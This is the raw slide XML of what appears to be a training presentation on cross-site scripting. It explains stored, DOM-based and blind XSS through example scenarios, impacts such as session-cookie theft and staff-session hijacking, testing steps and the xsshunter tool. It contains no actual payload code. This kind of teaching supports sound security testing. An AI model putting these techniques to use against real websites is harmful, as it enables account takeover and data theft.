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A786FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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205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86FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3484611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86FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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3934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86FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2659347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86FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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329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786FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="825157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786FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="847726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786FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1104544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86FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1453541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86FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199404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86FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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8837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786FAE9-4657-4C69-98F4-7153660CCCD2}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27/10/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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GB"/>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3533CCD-EFF1-4A94-93CF-2ABA47917B60}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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381181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w3schools.com/html/html_attributes.asp" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/default.asp" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_eventattributes.asp"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Tools</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>xsshunter</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42857676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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>As the name infers, the XSS payload is stored on the web application (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>in a database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, for example) and then gets run when other users visit the site or web page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Scenario:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>blog website that allows users to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>post comments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. Unfortunately, these comments aren't checked for whether they contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>JavaScript or filter out any malicious code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. If we now post a comment containing JavaScript, this will be stored in the database, and every other user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>now visiting the article will have the JavaScript run in their browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"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3307" y="1693517"/>
            <a:ext cx="8738550" cy="5164483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35829295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GB" b="1" dirty="0"/>
              <a:t>Potential Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>malicious JavaScript could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>redirect users to another site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, steal the user's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, or perform other website actions while acting as the visiting user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>How to test for Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You'll need to test every possible point of entry where it seems data is stored and then shown back in areas that other users have access to; a small example of these could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Comments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>blog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>profile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Website Listings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34436369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algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="4400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="4400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="4400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0"/>
              <a:t>Based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4997227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GB" dirty="0"/>
              <a:t>DOM stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ocument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>bject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>odel and is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programming interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> documents. It represents the page so that programs can change the document structure, style and content. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>A web page is a document, and this document can be either displayed in the browser window or as the HTML source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. A diagram of the HTML DOM is displayed below</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1114" y="1575321"/>
            <a:ext cx="6996193" cy="3829192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13786033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r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Exploiting the DOM</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Based XSS is where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>the JavaScript execution happens directly in the browser without any new pages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>being loaded or data submitted to backend code. Execution occurs when the website JavaScript code acts on input or user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>interaction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Example Scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The website's JavaScript gets the contents from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> parameter and then writes that onto the page in the currently being viewed section. The contents of the hash aren't checked for malicious code, allowing an attacker to inject JavaScript of their choosing onto the webpage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Crafted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>links could be sent to potential victims, redirecting them to another website or steal content from the page or the user's session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>How to test for Dom Based XSS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can be challenging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to test for and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requires a certain amount of knowledge of JavaScript to read the source code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.location.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2309314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5037662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Blind XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23495404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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Blind XSS is similar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>to a stored XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>in that your payload gets stored on the website for another user to view, but in this instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you can't see the payload working or be able to test it against yourself first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Scenario:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>website has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contact form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>where you can message a member of staff. The message content doesn't get checked for any malicious code, which allows the attacker to enter anything they wish. These messages then get turned into support tickets which staff view on a private web portal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Potential Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using the correct payload, the attacker's JavaScript could make calls back to an attacker's website, revealing the staff portal URL, the staff member's cookies, and even the contents of the portal page that is being viewed. Now the attacker could potentially hijack the staff member's session and have access to the private portal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>How to test for Blind XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When testing for Blind XSS vulnerabilities, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you need to ensure your payload has a call back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(usually an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>request). This way, you know if and when your code is being executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A popular tool for Blind XSS attacks is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>xsshunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25688622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indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Html tag: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.w3schools.com/tags/default.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
